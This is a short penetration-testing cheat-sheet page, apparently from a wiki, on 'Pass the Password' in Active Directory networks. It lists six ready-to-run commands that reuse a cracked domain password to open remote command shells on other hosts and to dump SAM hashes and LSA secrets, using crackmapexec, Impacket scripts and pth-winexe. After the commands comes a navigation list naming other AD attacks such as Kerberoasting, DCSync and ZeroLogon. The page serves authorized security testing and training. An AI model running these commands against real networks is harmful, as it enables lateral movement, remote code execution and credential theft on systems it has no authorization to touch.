Pass the Password

Overview

Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential

Attack 1: crackmapexec

sudo crackmapexec smb <target-or-CIDR> -u username -p password -d domain

Example

crackmapexec has an array of command line switches as well; some of which include --sam to dump hashes while running the attack.

Attack 2: smbexec.py

smbexec.py 'domain.tld/user.name:password@target'

Attack 3: wmiexec.py

wmiexec.py 'domain.tld/user.name:password@target' cmd.exe

Attack 4: psexec.py

psexec.py 'domain.tld/user.name:password@target' cmd.exe

Attack 5: pth-winexe

pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe

Attack 6: secretsdump.py

Dumps SAM hashes from the target and LSA secrets.

secretsdump.py 'domain.tld/user.name:password@target'

LLMNR Poisoning (Internal)

SMB Relay (Internal/External)

IPv6 DNS Spoofing (Internal)

Passback Attacks (Internal/External)

PrintNightmare (Internal/External)

PowerShell AD Module on Any Domain Host as Any User

Enumerating Hosts and Identifying the Domain Controllers

Dumping DNS Records with adidnsdump

CrackMapExec

PowerView

BloodHound

Remote Bloodhound

LdapDomainDump

LdapSearch

Enum4Linux

GetADUsers.py

GetUserSPNs.py

Manual Enumeration

Mimikatz

Dumping Hashes without Mimikatz

Impacket-Addcomputer

DCSync

Pass the Password

Pass the Hash

Password & Credential Brute Force

Token Impersonation

Kerberoasting

Group Policy Preferences (GPP)

PrintNightmare

ZeroLogon

Pass the Password

Overview

Attack 1: crackmapexec

Example

Attack 2: smbexec.py

Attack 3: wmiexec.py

Attack 4: psexec.py

Attack 5: pth-winexe

Attack 6: secretsdump.py

Example